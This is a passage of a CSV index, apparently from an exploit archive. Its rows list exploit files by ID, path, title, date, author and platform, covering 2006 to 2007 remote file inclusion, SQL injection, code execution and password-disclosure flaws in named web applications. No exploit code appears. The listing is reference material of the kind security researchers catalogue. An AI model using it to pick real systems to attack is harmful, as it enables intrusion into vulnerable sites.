- 'pt_upload.php' Remote File Inclusion",2006-12-24,g00ns,webapps,php, +3001,exploits/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - 'agent' SQL Injection",2006-12-24,ajann,webapps,asp, +3002,exploits/php/webapps/3002.php,"HLStats 1.34 - 'hlstats.php' SQL Injection",2006-12-25,"Michael Brooks",webapps,php, +3003,exploits/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2006-12-25,nuffsaid,webapps,php, +3004,exploits/php/webapps/3004.txt,"eNdonesia 8.4 - '/mod.php/friend.php/admin.php' Multiple Vulnerabilities",2006-12-25,z1ckX(ru),webapps,php, +3005,exploits/php/webapps/3005.pl,"MTCMS 2.0 - '/admin/admin_settings.php' Remote File Inclusion",2006-12-25,nuffsaid,webapps,php, +3006,exploits/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",webapps,php, +3007,exploits/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusions",2006-12-25,nuffsaid,webapps,php, +3008,exploits/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - 'path' Remote File Inclusion",2006-12-25,DeltahackingTEAM,webapps,php, +3009,exploits/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - 'mod_root' Remote File Inclusion",2006-12-25,"Mehmet Ince",webapps,php, +3010,exploits/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion",2006-12-25,"Mehmet Ince",webapps,php, +3011,exploits/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account",2006-12-25,"James Gray",webapps,php, +3012,exploits/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - 'ataturk.php' Remote File Inclusion",2006-12-25,ShaFuck31,webapps,php, +3014,exploits/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,webapps,php, +3015,exploits/asp/webapps/3015.pl,"The Classified Ad System 1.0 - 'main' SQL Injection",2006-12-26,ajann,webapps,asp, +3016,exploits/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection",2006-12-26,DarkFig,webapps,php, +3017,exploits/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,webapps,php, +3018,exploits/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,webapps,php, +3019,exploits/php/webapps/3019.txt,"myPHPCalendar 10192000b - 'cal_dir' Remote File Inclusion",2006-12-26,Cr@zy_King,webapps,php, +3020,exploits/php/webapps/3020.pl,"PHP-Update 2.7 - '/admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,webapps,php, +3025,exploits/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.phppath' Remote File Inclusion",2006-12-27,DeltahackingTEAM,webapps,php, +3026,exploits/php/webapps/3026.txt,"Bubla 1.0.0rc2 - '/bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,webapps,php, +3027,exploits/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusions",2006-12-27,Mr-m07,webapps,php, +3028,exploits/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",webapps,php, +3029,exploits/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php?popen()' Remote Injection",2006-12-27,rgod,webapps,php, +3031,exploits/asp/webapps/3031.txt,"aFAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection",2006-12-28,ajann,webapps,asp, +3032,exploits/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,webapps,asp, +3033,exploits/php/webapps/3033.txt,"phpBB2 Plus 1.53 - Acronym Mod SQL Injection",2006-12-28,"the master",webapps,php, +3035,exploits/asp/webapps/3035.txt,"ASPTicker 1.0 - Authentication Bypass",2006-12-28,ajann,webapps,asp, +3036,exploits/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,webapps,php, +3039,exploits/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,webapps,php, +3043,exploits/php/webapps/3043.txt,"x-news 1.1 - 'users.txt' Remote Password Disclosure",2006-12-30,bd0rk,webapps,php, +3044,exploits/php/webapps/3044.txt,"Voodoo chat 1.0RC1b - 'users.dat' Password Disclosure",2006-12-30,bd0rk,webapps,php, +3045,exploits/php/webapps/3045.php,"Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin",2006-12-30,rgod,webapps,php, +3046,exploits/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - 'viewsrc.asp' Script Source Disclosure",2006-12-30,"Inge Henriksen",webapps,asp, +3047,exploits/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - 'user.dat' Password Disclosure",2006-12-30,bd0rk,webapps,php, +3048,exploits/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - 'key' SQL Injection",2006-12-30,ajann,webapps,asp, +3049,exploits/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script",2006-12-30,Kacper,webapps,php, +3050,exploits/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",webapps,php, +3051,exploits/php/webapps/3051.txt,"WordPress Plugin Enigma 2 Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",webapps,php, +3053,exploits/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,webapps,php, +3054,exploits/php/webapps/3054.txt,"P-News 1.16/1.17 - 'user.dat' Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,webapps,php, +3057,exploits/php/webapps/3057.php,"MDForum 2.0.1 - 'PNSVlang' Remote Code Execution",2006-12-31,Kacper,webapps,php, +3059,exploits/php/webapps/3059.txt,"Bubla 0.9.2 - 'bu_dir' Multiple Remote File Inclusions",2006-12-31,DeltahackingTEAM,webapps,php, +3060,exploits/asp/webapps/3060.txt,"RBlog 1.0 - 'admin.mdb' Remote Password Disclosure",2007-01-01,"Aria-Security Team",webapps,asp, +3061,exploits/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp?id' SQL Injection",2007-01-01,chernobiLe,webapps,asp, +3062,exploits/asp/webapps/3062.txt,"AutoDealer 2.0 - 'detail.asp?iPro' SQL Injection",2007-01-01,ajann,webapps,asp, +3065,exploits/cgi/webapps/3065.txt,"WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure",2007-01-01,bd0rk,webapps,cgi, +3066,exploits/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,webapps,asp, +3068,exploits/asp/webapps/3068.html,"TaskTracker 1.5 - 'Customize.asp' Remote Add Administrator",2007-01-01,ajann,webapps,asp, +3073,exploits/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - 'subcatID' SQL Injection",2007-01-03,ajann,webapps,asp, +3074,exploits/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,webapps,asp, +3075,exploits/php/webapps/3075.pl,"VerliAdmin 0.3 - 'language.php' Local File Inclusion",2007-01-03,Kw3[R]Ln,webapps,php, +3076,exploits/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,webapps,php, +3079,exploits/php/webapps/3079.txt,"Aratix 0.2.2b11 - '/inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,webapps,php, +3081,exploits/asp/webapps/3081.pl,"DigiRez 3.4 - 'book_id' SQL Injection",2007-01-04,ajann,webapps,asp, +3082,exploits/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php?id' SQL Injection",2007-01-05,"Michael Brooks",webapps,php, +3083,exploits/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",webapps,php, +3085,exploits/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,webapps,php, +3089,exploits/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,webapps,asp, +3090,exploits/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusions",2007-01-06,"Mehmet Ince",webapps,php, +3091,exploits/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,webapps,php, +3093,exploits/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Remote File Inclusion",2007-01-07,beks,webapps,php, +3095,exploits/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",webapps,php, +3096,exploits/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,webapps,php, +3097,exploits/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,webapps,php, +3100,exploits/php/webapps/3100.txt,"Magic Photo Storage Website - '_config[site_path]' File Inclusion",2007-01-08,k1tk4t,webapps,php, +3103,exploits/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution",2007-01-08,DarkFig,webapps,php, +3104,exploits/php/webapps/3104.txt,"PPC Search Engine 1.61 - 'INC' Multiple Remote File Inclusions",2007-01-09,IbnuSina,webapps,php, +3105,exploits/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,webapps,asp, +3106,exploits/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,webapps,php, +3108,exploits/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,webapps,php, +3109,exploits/php/webapps/3109.php,"WordPress 2.0.6 - 'wp-trackback.php' SQL Injection",2007-01-10,rgod,webapps,php, +3113,exploits/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,webapps,php, +3114,exploits/php/webapps/3114.txt,"Article System 0.1 - 'INCLUDE_DIR' Remote File Inclusion",2007-01-11,3l3ctric-Cracker,webapps,php, +3115,exploits/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting",2007-01-11,ajann,webapps,asp, +3116,exploits/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,webapps,php, +3117,exploits/php/webapps/3117.txt,"LunarPoll 1.0 - 'show.php?PollDir' Remote File Inclusion",2007-01-12,"ilker Kandemir",webapps,php, +3118,exploits/php/webapps/3118.txt,"TLM CMS 1.1 - 'i-accueil.php?chemin' Remote File Inclusion",2007-01-12,GoLd_M,webapps,php, +3120,exploits/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - 'duyuru.asp?id' SQL Injection",2007-01-12,chernobiLe,webapps,php, +3121,exploits/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,webapps,php, +3122,exploits/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' SQL Injection",2007-01-13,ajann,webapps,asp, +3123,exploits/php/webapps/3123.html,"FdWeB Espace Membre 2.01 - 'path' Remote File Inclusion",2007-01-13,ajann,webapps,php, +3124,exploits/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,webapps,php, +3125,exploits/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,webapps,php, +3134,exploits/php/webapps/3134.php,"KGB 1.9 - 'sesskglogadmin.php' Local File Inclusion",2007-01-15,Kacper,webapps,php, +3135,exploits/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",webapps,asp, +3141,exploits/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php?id' SQL Injection",2007-01-17,SlimTim10,webapps,php, +3143,exploits/php/webapps/3143.php,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)",2007-01-17,"silent vapor",webapps,php, +3144,exploits/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)",2007-01-17,trew,webapps,php, +3145,exploits/php/webapps/3145.txt,"PHPMyphorum 1.5a - '/mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,webapps,php, +3146,exploits/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)",2007-01-17,666,webapps,php, +3147,exploits/php/webapps/3147.txt,"Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion",2007-01-17,GoLd_M,webapps,php, +3150,exploits/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - '/lang/index.php' Remote File Inclusion",2007-01-17,3l3ctric-Cracker,webapps,php, +3152,exploits/php/webapps/3152.txt,"ComVironment 4.0 - 'grab_globals.lib.php' Remote File Inclusion",2007-01-18,GoLd_M,webapps,php, +3153,exploits/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,webapps,php, +3161,exploits/php/webapps/3161.txt,"PHPSherpa - '/include/config.inc.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,webapps,php, +3162,exploits/php/webapps/3162.txt,"Bradabra 2.0.5 - '/include/includes.php' Remote File Inclusion",2007-01-20,GoLd_M,webapps,php, +3163,exploits/php/webapps/3163.txt,"Neon Labs Website 3.2 - 'nl.php?g_strRootDir' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,webapps,php, +3164,exploits/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - 'config.php' Remote File Inclusion",2007-01-20,DeltahackingTEAM,webapps,php, +3165,exploits/php/webapps/3165.txt,"MySpeach 2.1b - 'up.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,webapps,php, +3169,exploits/php/webapps/3169.txt,"WebChat 0.77 - 'defines.php?WEBCHATPATH' Remote File Inclusion",2007-01-21,v1per-haCker,webapps,php, +3171,exploits/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - 'index.php?gen' Remote File Inclusion",2007-01-21,DeltahackingTEAM,webapps,php, +3172,exploits/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,webapps,php, +3174,exploits/php/webapps/3174.txt,"Upload Service 1.0 - 'top.php?maindir' Remote File Inclusion",2007-01-21,y3dips,webapps,php, +3175,exploits/php/webapps/3175.pl,"VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion",2007-01-22,bd0rk,webapps,php, +3180,exploits/php/webapps/3180.pl,"Vote-Pro 4.0 - 'poll_frame.php?poll_id' Remote Code Execution",2007-01-23,r0ut3r,webapps,php, +3183,exploits/php/webapps/3183.txt,"BBClone 0.31 - 'selectlang.php' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,webapps,php, +3184,exploits/php/webapps/3184.txt,"phpXD 0.3 - 'path' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,webapps,php, +3185,exploits/php/webapps/3185.txt,"RPW 1.0.2 - 'config.php?sql_language' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,webapps,php, +3186,exploits/asp/webapps/3186.txt,"ASP EDGE 1.2b - 'user.asp' SQL Injection",2007-01-24,ajann,webapps,asp, +3187,exploits/asp/webapps/3187.txt,"ASP NEWS 3.0 - 'news_detail.asp' SQL Injection",2007-01-24,ajann,webapps,asp, +3191,exploits/php/webapps/3191.txt,"vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,webapps,php, +3192,exploits/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",webapps,php, +3194,exploits/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,webapps,asp, +3195,exploits/asp/webapps/3195.txt,"GPS CMS 1.2 - 'print.asp' SQL Injection",2007-01-25,ajann,webapps,asp, +3196,exploits/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,webapps,php, +3197,exploits/asp/webapps/3197.txt,"forum livre 1.0 - SQL Injection / Cross-Site Scripting",2007-01-25,ajann,webapps,asp, +3198,exploits/php/webapps/3198.txt,"Virtual Path 1.0 - '/vp/configure.php' Remote File Inclusion",2007-01-25,GoLd_M,webapps,php, +3201,exploits/php/webapps/3201.txt,"MyPHPcommander 2.0 - 'package.php' Remote File Inclusion",2007-01-26,"Cold Zero",webapps,php, +3202,exploits/php/webapps/3202.txt,"AINS 0.02b - 'ains_main.php?ains_path' Remote File Inclusion",2007-01-26,"ThE dE@Th",webapps,php, +3203,exploits/php/webapps/3203.txt,"FD Script 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,webapps,php, +3205,exploits/php/webapps/3205.txt,"nsGalPHP - '/includes/config.inc.php?racineTBS' Remote File Inclusion",2007-01-27,S.W.A.T.,webapps,php, +3206,exploits/php/webapps/3206.txt,"ACGVclick 0.2.0 - 'path' Remote File Inclusion",2007-01-27,ajann,webapps,php, +3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php, +3208,exploits/php/webapps/3208.txt,"ACGVannu 1.3 - 'index2.php' Remote User Pass Change",2007-01-27,ajann,webapps,php, +3209,exploits/php/webapps/3209.txt,"Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion",2007-01-27,"ThE dE@Th",webapps,php, +3210,exploits/asp/webapps/3210.txt,"chernobiLe Portal 1.0 - 'default.asp' SQL Injection",2007-01-27,ajann,webapps,asp, +3212,exploits/php/webapps/3212.txt,"PHPMyReports 3.0.11 - 'lib_head.php' Remote File Inclusion",2007-01-27,GoLd_M,webapps,php, +3214,exploits/php/webapps/3214.pl,"EclipseBB 0.5.0 Lite - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",webapps,php, +3215,exploits/php/webapps/3215.pl,"Foro Domus 2.10 - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",webapps,php, +3216,exploits/php/webapps/3216.txt,"xNews 1.3 - 'xNews.php' SQL Injection",2007-01-28,ajann,webapps,php, +3217,exploits/php/webapps/3217.txt,"PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion",2007-01-28,"Mehmet Ince",webapps,php, +3221,exploits/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution",2007-01-29,rgod,webapps,php, +3222,exploits/php/webapps/3222.txt,"Webfwlog 0.92 - 'debug.php' Remote File Disclosure",2007-01-29,GoLd_M,webapps,php, +3225,exploits/php/webapps/3225.pl,"Galeria Zdjec 3.0 - 'zd_numer.php' Local File Inclusion",2007-01-30,ajann,webapps,php, +3226,exploits/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,webapps,php, +3227,exploits/php/webapps/3227.txt,"CascadianFAQ 4.1 - 'index.php' SQL Injection",2007-01-30,ajann,webapps,php, +3228,exploits/php/webapps/3228.txt,"MyNews 4.2.2 - 'themefunc.php' Remote File Inclusion",2007-01-30,GoLd_M,webapps,php, +3231,exploits/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",webapps,php, +3232,exploits/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,webapps,php, +3233,exploits/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - 'tr' SQL Injection",2007-01-31,cl24zy,webapps,asp, +3234,exploits/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection",2007-01-31,ajann,webapps,php, +3235,exploits/php/webapps/3235.txt,"phpBB Tweaked 3 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",webapps,php, +3236,exploits/php/webapps/3236.txt,"Hailboards 1.2.0 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",webapps,php, +3237,exploits/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,webapps,php, +3238,exploits/php/webapps/3238.txt,"PHPMyRing 4.1.3b - 'fichier' Remote File Inclusion",2007-01-31,ajann,webapps,php, +3239,exploits/php/webapps/3239.html,"Extcalendar 2 - 'profile.php' Remote User Pass Change",2007-01-31,ajann,webapps,php, +3240,exploits/php/webapps/3240.txt,"JV2 Folder Gallery 3.0 - Remote File Inclusion",2007-01-31,"ThE dE@Th",webapps,php, +3241,exploits/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti - 'tr' SQL Injection",2007-01-31,cl24zy,webapps,asp, +3242,exploits/php/webapps/3242.txt,"Omegaboard 1.0beta4 - 'functions.php' Remote File Inclusion",2007-01-31,"Mehmet Ince",webapps,php, +3243,exploits/php/webapps/3243.txt,"Cerulean Portal System 0.7b - Remote File Inclusion",2007-01-31,"Mehmet Ince",webapps,php, +3245,exploits/php/webapps/3245.txt,"SIPS 0.3.1 - 'box.inc.php' Remote File Inclusion",2007-02-01,ajann,webapps,php, +3246,exploits/php/webapps/3246.txt,"phpEventMan 1.0.2 - 'level' Remote File Inclusion",2007-02-01,"Mehmet Ince",webapps,php, +3247,exploits/php/webapps/3247.txt,"Epistemon 1.0 - 'common.php?inc_path' Remote File Inclusion",2007-02-01,GoLd_M,webapps,php, +3249,exploits/php/webapps/3249.txt,"WebBuilder 2.0 - 'StageLoader.php' Remote File Inclusion",2007-02-01,GoLd_M,webapps,php, +3250,exploits/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion",2007-02-01,"laurent gaffié",webapps,php, +3251,exploits/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",webapps,php, +3252,exploits/php/webapps/3252.txt,"EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup",2007-02-02,Eight10,webapps,php, +3253,exploits/php/webapps/3253.txt,"Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",webapps,php, +3255,exploits/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution",2007-02-02,Kacper,webapps,php, +3256,exploits/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - 'c_id' SQL Injection",2007-02-02,ajann,webapps,php, +3258,exploits/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - 'ezconvert_dir' Remote File Inclusion",2007-02-02,"Mehmet Ince",webapps,php, +3259,exploits/php/webapps/3259.pl,"phpBB++ Build 100 - 'phpbb_root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",webapps,php, +3261,exploits/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - 'view.php' SQL Injection",2007-02-03,ajann,webapps,php, +3262,exploits/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - 'pms.php' SQL Injection",2007-02-03,rgod,webapps,php, +3263,exploits/php/webapps/3263.txt,"KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion",2007-02-03,AsTrex,webapps,php, +3266,exploits/php/webapps/3266.txt,"Flip 2.01 final - 'previewtheme.php?inc_path' Remote File Inclusion",2007-02-04,GoLd_M,webapps,php, +3267,exploits/php/webapps/3267.txt,"Geeklog 2 - 'BaseView.php' Remote File Inclusion",2007-02-05,GoLd_M,webapps,php, +3268,exploits/php/webapps/3268.txt,"SMA-DB 0.3.9 - 'settings.php' Remote File Inclusion",2007-02-05,"ThE dE@Th",webapps,php, +3270,exploits/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - 'phpbb_root_path' Remote File Inclusion",2007-02-05,"Mehmet Ince",webapps,php, +3271,exploits/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,webapps,php, +3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,webapps,php, +3278,exploits/php/webapps/3278.txt,"Kisisel Site 2007 - 'tr' SQL Injection",2007-02-06,cl24zy,webapps,php, +3280,exploits/php/webapps/3280.txt,"AgerMenu 0.01 - 'top.inc.php?rootdir' Remote File Inclusion",2007-02-07,GoLd_M,webapps,php, +3281,exploits/php/webapps/3281.txt,"WebMatic 2.6 - 'index_album.php' Remote File Inclusion",2007-02-07,MadNet,webapps,php, +3282,exploits/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator",2007-02-07,diwou,webapps,php, +3283,exploits/php/webapps/3283.txt,"otscms 2.1.5 - SQL Injection / Cross-Site Scripting",2007-02-07,GregStar,webapps,php, +3284,exploits/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Remote File Inclusion",2007-02-07,Denven,webapps,php, +3285,exploits/php/webapps/3285.html,"Site-Assistant 0990 - 'paths[version]' Remote File Inclusion",2007-02-08,ajann,webapps,php, +3286,exploits/php/webapps/3286.asp,"LightRO CMS 1.0 - 'index.php?projectid' SQL Injection",2007-02-08,ajann,webapps,php, +3287,exploits/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,webapps,php, +3288,exploits/php/webapps/3288.asp,"LushiWarPlaner 1.0 - 'register.php' SQL Injection",2007-02-08,ajann,webapps,php, +3292,exploits/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,webapps,php, +3295,exploits/asp/webapps/3295.txt,"philboard 1.14 - 'philboard_forum.asp' SQL Injection",2007-02-12,"Mehmet Ince",webapps,asp, +3297,exploits/php/webapps/3297.html,"AT Contenator 1.0 - 'Root_To_Script' Remote File Inclusion",2007-02-13,ajann,webapps,php, +3298,exploits/php/webapps/3298.pl,"Xaran CMS 2.0 - 'xarancms_haupt.php' SQL Injection",2007-02-13,ajann,webapps,php, +3299,exploits/php/webapps/3299.pl,"PHPCC 4.2 Beta - 'nickpage.php?npid' SQL Injection",2007-02-13,ajann,webapps,php, +3300,exploits/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution",2007-02-13,diwou,webapps,php, +3301,exploits/asp/webapps/3301.txt,"PollMentor 2.0 - 'pollmentorres.asp?id' SQL Injection",2007-02-13,SaO,webapps,asp, +3305,exploits/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,webapps,php, +3309,exploits/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - '/index.php' Local/Remote File Inclusion",2007-02-14,DarkFig,webapps,php, +3310,exploits/php/webapps/3310.php,"Jupiter CMS 1.1.5 - 'Client-IP' SQL Injection",2007-02-14,DarkFig,webapps,php, +3311,exploits/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Arbitrary File Upload",2007-02-14,DarkFig,webapps,php, +3312,exploits/php/webapps/3312.pl,"Drupal < 5.1 - Post Comments Remote Command Execution",2007-02-15,str0ke,webapps,php, +3313,exploits/php/webapps/3313.pl,"Drupal < 4.7.6 - Post Comments Remote Command Execution",2007-02-15,str0ke,webapps,php, +3314,exploits/php/webapps/3314.txt,"ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion",2007-02-15,"ThE dE@Th",webapps,php, +3315,exploits/php/webapps/3315.txt,"nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion",2007-02-15,Cr@zy_King,webapps,php, +3317,exploits/asp/webapps/3317.txt,"CodeAvalanche News 1.x - 'CAT_ID' SQL Injection",2007-02-15,beks,webapps,asp, +3318,exploits/asp/webapps/3318.txt,"Aktueldownload Haber scripti - 'id' SQL Injection",2007-02-15,"Mehmet Ince",webapps,asp, +3321,exploits/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection",2007-02-16,"Mehmet Ince",webapps,asp, +3322,exploits/php/webapps/3322.html,"VS-News-System 1.2.1 - 'newsordner' Remote File Inclusion",2007-02-16,ajann,webapps,php, +3323,exploits/php/webapps/3323.html,"VS-Link-Partner 2.1 - 'script_pfad' Remote File Inclusion",2007-02-16,ajann,webapps,php, +3324,exploits/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - 'ht_pfad' Remote File Inclusion",2007-02-16,kezzap66345,webapps,php, +3325,exploits/php/webapps/3325.pl,"webSPELL 4.01.02 - 'showonly' Blind SQL Injection",2007-02-16,DNX,webapps,php, +3326,exploits/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,webapps,php, +3327,exploits/php/webapps/3327.txt,"XLAtunes 0.1 - 'album' SQL Injection",2007-02-17,Bl0od3r,webapps,php, +3328,exploits/php/webapps/3328.html,"S-Gastebuch 1.5.3 - 'gb_pfad' Remote File Inclusion",2007-02-18,ajann,webapps,php, +3332,exploits/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,webapps,php, +3334,exploits/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL 